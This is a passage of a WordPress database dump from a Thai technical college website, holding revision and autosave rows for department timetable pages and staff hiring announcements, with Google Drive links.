(2479, 3, '2018-05-11 23:22:51', '2018-05-11 16:22:51', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5-%E0%B8%88%E0%B8%99%E0%B8%97.%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่งานวิทยบริการ จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '2475-autosave-v1', '', '', '2018-05-11 23:22:51', '2018-05-11 16:22:51', '', 2475, 'http://www.technicrayong.ac.th/2475-autosave-v1/', 0, 'revision', '', 0),
(2480, 3, '2018-05-11 23:25:06', '2018-05-11 16:25:06', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '2070-autosave-v1', '', '', '2018-05-11 23:25:06', '2018-05-11 16:25:06', '', 2070, 'http://www.technicrayong.ac.th/2070-autosave-v1/', 0, 'revision', '', 0),
(2484, 4, '2018-05-15 04:28:39', '2018-05-14 21:28:39', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1HZz4VHNW6t3Wb_yIA7M1Vvldc0MVjJ0i\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก', '', 'inherit', 'closed', 'closed', '', '2262-revision-v1', '', '', '2018-05-15 04:28:39', '2018-05-14 21:28:39', '', 2262, 'http://www.technicrayong.ac.th/2262-revision-v1/', 0, 'revision', '', 0),
(2485, 4, '2018-05-15 04:29:50', '2018-05-14 21:29:50', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1HZz4VHNW6t3Wb_yIA7M1Vvldc0MVjJ0i\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก', '', 'inherit', 'closed', 'closed', '', '2262-autosave-v1', '', '', '2018-05-15 04:29:50', '2018-05-14 21:29:50', '', 2262, 'http://www.technicrayong.ac.th/2262-autosave-v1/', 0, 'revision', '', 0),
(2487, 4, '2018-05-15 04:30:59', '2018-05-14 21:30:59', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1W_aeZtZ02lsXu4MWnGPYupgwbuVAZ-4x\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการโรงแรม', '', 'inherit', 'closed', 'closed', '', '2290-revision-v1', '', '', '2018-05-15 04:30:59', '2018-05-14 21:30:59', '', 2290, 'http://www.technicrayong.ac.th/2290-revision-v1/', 0, 'revision', '', 0),
(2489, 4, '2018-05-15 04:31:40', '2018-05-14 21:31:40', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1W_aeZtZ02lsXu4MWnGPYupgwbuVAZ-4x\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการโรงแรม', '', 'inherit', 'closed', 'closed', '', '2290-autosave-v1', '', '', '2018-05-15 04:31:40', '2018-05-14 21:31:40', '', 2290, 'http://www.technicrayong.ac.th/2290-autosave-v1/', 0, 'revision', '', 0),
(2491, 4, '2018-05-15 04:32:59', '2018-05-14 21:32:59', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1zM15kJiJTh4hk690TAIcWuUB6w7gxyXp\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคหกรรมศาสตร์', '', 'inherit', 'closed', 'closed', '', '2278-revision-v1', '', '', '2018-05-15 04:32:59', '2018-05-14 21:32:59', '', 2278, 'http://www.technicrayong.ac.th/2278-revision-v1/', 0, 'revision', '', 0),
(2493, 4, '2018-05-15 04:33:45', '2018-05-14 21:33:45', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1y0O7XIS34C2eUX3_ga4kzcYMNzqsIjdY\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาอาหารและโภชนาการ', '', 'inherit', 'closed', 'closed', '', '2282-revision-v1', '', '', '2018-05-15 04:33:45', '2018-05-14 21:33:45', '', 2282, 'http://www.technicrayong.ac.th/2282-revision-v1/', 0, 'revision', '', 0),
(2495, 4, '2018-05-15 04:35:21', '2018-05-14 21:35:21', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1LZOFp212g4OhdfRGvzcH1FTZ3cVpUuZh\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '2270-revision-v1', '', '', '2018-05-15 04:35:21', '2018-05-14 21:35:21', '', 2270, 'http://www.technicrayong.ac.th/2270-revision-v1/', 0, 'revision', '', 0),
(2496, 4, '2018-05-15 04:36:47', '2018-05-14 21:36:47', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1LCGiXrudvYOJQ-bLUJR1u2vMFsC9z2Np\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเคมีอุตสาหกรรม', '', 'inherit', 'closed', 'closed', '', '2246-autosave-v1', '', '', '2018-05-15 04:36:47', '2018-05-14 21:36:47', '', 2246, 'http://www.technicrayong.ac.th/2246-autosave-v1/', 0, 'revision', '', 0),
(2497, 4, '2018-05-15 04:36:20', '2018-05-14 21:36:20', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1LCGiXrudvYOJQ-bLUJR1u2vMFsC9z2Np\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเคมีอุตสาหกรรม', '', 'inherit', 'closed', 'closed', '', '2246-revision-v1', '', '', '2018-05-15 04:36:20', '2018-05-14 21:36:20', '', 2246, 'http://www.technicrayong.ac.th/2246-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2499, 4, '2018-05-15 04:38:05', '2018-05-14 21:38:05', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1XZFoP9L7lisH5J-j0xdwgT0Pg7nyNmu3\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเครื่องมือวัดและควบคุม', '', 'inherit', 'closed', 'closed', '', '2238-revision-v1', '', '', '2018-05-15 04:38:05', '2018-05-14 21:38:05', '', 2238, 'http://www.technicrayong.ac.th/2238-revision-v1/', 0, 'revision', '', 0),
(2500, 4, '2018-05-15 04:39:15', '2018-05-14 21:39:15', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1T0pHa-7DaD8MgGMHkrCXBccgesDQ9lSQ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1eddod67RH3QhKVcoO-Fv9rs0SbahG95M\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<a href=\"https://drive.google.com/open?id=1ZADW8xErX7qgL7c2dSd3kUp3LarrOCgV\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ', '', 'inherit', 'closed', 'closed', '', '2222-autosave-v1', '', '', '2018-05-15 04:39:15', '2018-05-14 21:39:15', '', 2222, 'http://www.technicrayong.ac.th/2222-autosave-v1/', 0, 'revision', '', 0),
(2501, 4, '2018-05-15 04:39:07', '2018-05-14 21:39:07', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1T0pHa-7DaD8MgGMHkrCXBccgesDQ9lSQ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1eddod67RH3QhKVcoO-Fv9rs0SbahG95M\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1ZADW8xErX7qgL7c2dSd3kUp3LarrOCgV\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ', '', 'inherit', 'closed', 'closed', '', '2222-revision-v1', '', '', '2018-05-15 04:39:07', '2018-05-14 21:39:07', '', 2222, 'http://www.technicrayong.ac.th/2222-revision-v1/', 0, 'revision', '', 0),
(2502, 4, '2018-05-15 04:40:21', '2018-05-14 21:40:21', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1Q4gTiQb2EF_IAwwNWXUadRokrUfMPBGo\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกเทคโนโลยียาง', '', 'inherit', 'closed', 'closed', '', '2250-autosave-v1', '', '', '2018-05-15 04:40:21', '2018-05-14 21:40:21', '', 2250, 'http://www.technicrayong.ac.th/2250-autosave-v1/', 0, 'revision', '', 0),
(2503, 4, '2018-05-15 04:40:13', '2018-05-14 21:40:13', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1Q4gTiQb2EF_IAwwNWXUadRokrUfMPBGo\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกเทคโนโลยียาง', '', 'inherit', 'closed', 'closed', '', '2250-revision-v1', '', '', '2018-05-15 04:40:13', '2018-05-14 21:40:13', '', 2250, 'http://www.technicrayong.ac.th/2250-revision-v1/', 0, 'revision', '', 0),
(2504, 4, '2018-05-15 04:41:10', '2018-05-14 21:41:10', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1cVm3D-1GKp9tuOifM3m1hZaezrOgV0Ta\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการจัดการโลจิสติกส์', '', 'inherit', 'closed', 'closed', '', '2274-autosave-v1', '', '', '2018-05-15 04:41:10', '2018-05-14 21:41:10', '', 2274, 'http://www.technicrayong.ac.th/2274-autosave-v1/', 0, 'revision', '', 0),
(2505, 4, '2018-05-15 04:41:02', '2018-05-14 21:41:02', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1cVm3D-1GKp9tuOifM3m1hZaezrOgV0Ta\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการจัดการโลจิสติกส์', '', 'inherit', 'closed', 'closed', '', '2274-revision-v1', '', '', '2018-05-15 04:41:02', '2018-05-14 21:41:02', '', 2274, 'http://www.technicrayong.ac.th/2274-revision-v1/', 0, 'revision', '', 0),
(2507, 4, '2018-05-15 04:42:51', '2018-05-14 21:42:51', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1OWe9N1wFXCKBcx6x059z2kJ3l-kcMmNU\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างก่อสร้าง', '', 'inherit', 'closed', 'closed', '', '2235-revision-v1', '', '', '2018-05-15 04:42:51', '2018-05-14 21:42:51', '', 2235, 'http://www.technicrayong.ac.th/2235-revision-v1/', 0, 'revision', '', 0),
(2509, 4, '2018-05-15 04:44:12', '2018-05-14 21:44:12', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1hfrmkgAR_J5bs1__VA_9B9oAAMpz8zuv\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการเลขานุการ/การจัดการสำนักงาน', '', 'inherit', 'closed', 'closed', '', '2266-revision-v1', '', '', '2018-05-15 04:44:12', '2018-05-14 21:44:12', '', 2266, 'http://www.technicrayong.ac.th/2266-revision-v1/', 0, 'revision', '', 0),
(2511, 4, '2018-05-15 04:45:03', '2018-05-14 21:45:03', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1hfrmkgAR_J5bs1__VA_9B9oAAMpz8zuv\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการบัญชี', '', 'inherit', 'closed', 'closed', '', '2258-revision-v1', '', '', '2018-05-15 04:45:03', '2018-05-14 21:45:03', '', 2258, 'http://www.technicrayong.ac.th/2258-revision-v1/', 0, 'revision', '', 0),
(2512, 4, '2018-05-15 04:50:58', '2018-05-14 21:50:58', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1kHu5BCORMmylm-mynHbBdRrEQyCZtcmI\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการบัญชี', '', 'inherit', 'closed', 'closed', '', '2258-autosave-v1', '', '', '2018-05-15 04:50:58', '2018-05-14 21:50:58', '', 2258, 'http://www.technicrayong.ac.th/2258-autosave-v1/', 0, 'revision', '', 0),
(2513, 4, '2018-05-15 04:50:49', '2018-05-14 21:50:49', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1kHu5BCORMmylm-mynHbBdRrEQyCZtcmI\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการบัญชี', '', 'inherit', 'closed', 'closed', '', '2258-revision-v1', '', '', '2018-05-15 04:50:49', '2018-05-14 21:50:49', '', 2258, 'http://www.technicrayong.ac.th/2258-revision-v1/', 0, 'revision', '', 0),
(2514, 4, '2018-05-15 04:51:32', '2018-05-14 21:51:32', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1hfrmkgAR_J5bs1__VA_9B9oAAMpz8zuv\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการเลขานุการ/การจัดการสำนักงาน', '', 'inherit', 'closed', 'closed', '', '2266-autosave-v1', '', '', '2018-05-15 04:51:32', '2018-05-14 21:51:32', '', 2266, 'http://www.technicrayong.ac.th/2266-autosave-v1/', 0, 'revision', '', 0),
(2515, 4, '2018-05-15 04:51:57', '2018-05-14 21:51:57', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1LZOFp212g4OhdfRGvzcH1FTZ3cVpUuZh\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '2270-autosave-v1', '', '', '2018-05-15 04:51:57', '2018-05-14 21:51:57', '', 2270, 'http://www.technicrayong.ac.th/2270-autosave-v1/', 0, 'revision', '', 0),
